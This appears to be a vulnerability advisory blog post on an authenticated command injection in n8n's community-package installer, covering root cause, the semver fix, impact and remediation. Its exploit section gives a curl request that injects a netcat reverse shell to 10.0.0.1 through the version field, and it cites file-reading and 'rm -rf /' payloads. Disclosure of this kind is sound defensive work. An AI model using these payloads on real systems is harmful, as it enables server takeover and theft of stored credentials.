CVE-2026-21893

n8n RCE: Automating Your Own Demise via CVE-2026-21893

Amit Schendel
Amit Schendel
Senior Security Researcher

Feb 4, 2026·5 min read·8 visits

Executive Summary (TL;DR)

Authenticated admins can trigger RCE in n8n versions < 1.120.3 by injecting shell commands into the 'version' field during community package installation. Update immediately.

A critical OS Command Injection vulnerability in n8n's community package installation logic allows authenticated administrators to execute arbitrary code on the host server. The flaw arises from unsafe string concatenation of the 'version' parameter into a shell command.

The Hook: Automation or Self-Destruction?

n8n is the darling of the workflow automation world. It connects everything to everything—webhooks, databases, APIs—allowing you to build complex pipelines with a drag-and-drop interface. It’s powerful, it’s flexible, and as it turns out, it was a little too willing to execute whatever you threw at it.

CVE-2026-21893 isn't some complex memory corruption bug requiring a Ph.D. in heap feng shui. It’s the security equivalent of leaving your front door locked but taping the key to the window. This vulnerability lies in the community nodes feature, which allows admins to install custom packages to extend functionality.

While the vulnerability requires administrative privileges (CVSS PR:H), don't roll your eyes and scroll past. In many self-hosted n8n instances, 'admin' is the default state, or credentials are shared loosely among dev teams. Furthermore, if an attacker chains this with a lower-severity auth bypass or SSRF, they upgrade instantly from "annoying guest" to "sysadmin."

The Flaw: The Fatal Concatenation

The root cause here is a tale as old as time: Unsanitized Input in Shell Commands. When you ask n8n to install a community package, it effectively turns around and tells the underlying operating system to run npm install.

Ideally, a developer uses an execFile style function where arguments are passed as an array, separating the command from the data. This prevents the shell from interpreting data as instructions.

However, in the vulnerable versions of n8n, the application took the package name and the version string provided by the user and—metaphorically speaking—mashed them together with a plus sign. The logic constructed a command string that looked something like npm install package@version.

The problem? The version parameter wasn't checked to see if it was actually a version number. It was just a string. And strings can contain semicolons, pipes, and backticks—the holy trinity of shell injection.

The Code: A Tale of Two Commits

Let's look at the smoking gun. The vulnerability lived in packages/cli/src/modules/community-packages/community-packages.controller.ts and the corresponding service. The code blindly trusted that the version variable contained something safe like 1.0.0.

The fix, applied in commit ae0669a736cc496beeb296e115267862727ae838, is embarrassingly simple but effective. The developers imported the semver library to validate the input before doing anything else.

The Vulnerable Logic (Conceptual):

// The code implicitly did this:
const command = `npm install ${packageName}@${version}`;
child_process.exec(command, ...);

The Fix:

import { valid } from 'semver';
 
// ... inside the controller method
if (version && !valid(version)) {
    throw new BadRequestError(`Invalid version: ${version}`);
}

By forcing the input to pass semver.valid(), any attempt to inject shell characters like ; or | immediately throws an error because 1.0.0; rm -rf / is definitely not a valid semantic version. This is the difference between a BadRequestError and a compromised server.

The Exploit: Breaking Out

Exploiting this is trivial for anyone with access to the API. We simply need to make a request to install a package but append our malicious payload to the version string.

The Attack Vector: We target the endpoint used to install community packages. We pick a legitimate package name to satisfy the initial checks, but we poison the version.

Payload Construction: Instead of requesting version 1.0.0, we request version: 1.0.0; cat /etc/passwd > /tmp/pwned.

curl -X POST https://n8n.target.com/rest/community-packages \
  -H "Content-Type: application/json" \
  -H "Cookie: n8n-auth-token=..." \
  -d '{
    "name": "n8n-nodes-base",
    "version": "1.0.0; nc -e /bin/sh 10.0.0.1 1337"
  }'

What happens on the server:

  1. The app constructs the command: npm install n8n-nodes-base@1.0.0; nc -e /bin/sh 10.0.0.1 1337
  2. The shell sees the semicolon ; as a command separator.
  3. It executes npm install ... (which might fail or succeed, it doesn't matter).
  4. It then executes nc -e /bin/sh ..., connecting a reverse shell back to the attacker.

If the n8n instance is running in a Docker container (common), you are now root inside the container. If it's running bare metal... well, game over.

The Impact: Why Panic?

The CVSS score is 9.4 (Critical) for a reason. Yes, it requires privileges, but the impact is absolute.

1. Full System Compromise: Since n8n is often used to automate infrastructure tasks, the server running it usually sits in a privileged position within the network. It might have IAM roles attached (AWS), access to internal databases, or SSH keys stored in the environment.

2. Data Exfiltration: An attacker can dump all the workflows, credentials, and API keys stored within n8n. Remember, n8n's whole job is to store credentials for other services. Breaking into n8n is like breaking into a password manager.

3. Persistence: Once inside, an attacker can modify existing workflows to send a copy of every piece of data processed by the company to a remote server. They can turn your automation tool into an automated exfiltration engine.

The Fix: Stop the Bleeding

The remediation is straightforward: Update. The vulnerability is patched in version 1.120.3. If you are running anything below that, you are exposed.

If you cannot update immediately for some reason (fear of breaking changes in your workflows), you must restrict network access to the n8n administrative interface. Ensure it is behind a VPN or an authenticated reverse proxy (like Authelia or Cloudflare Access) so that only trusted IPs can even attempt the exploit.

Also, consider this a wake-up call to audit the privileges of the user running your n8n process. It should never run as root. Use the official Docker images which support running as a non-root user (node).

Fix Analysis (1)

Technical Appendix

CVSS Score
9.4/ 10
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Affected Systems

n8n Self-Hosted Instancesn8n Docker Containers

Affected Versions Detail

Product
Affected Versions
Fixed Version
n8n
n8n-io
>= 0.187.0, < 1.120.31.120.3
AttributeDetail
CWE IDCWE-78 (OS Command Injection)
CVSS v4.09.4 (Critical)
Attack VectorNetwork (Authenticated)
Exploit StatusPoC Available
Affected Versions0.187.0 < 1.120.3
Patch Commitae0669a736
CWE-78
OS Command Injection

The software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

Vulnerability Timeline

Patch Committed
2025-11-14
Public Disclosure
2026-02-04

Subscribe to updates

Get the latest CVE analysis reports delivered to your inbox.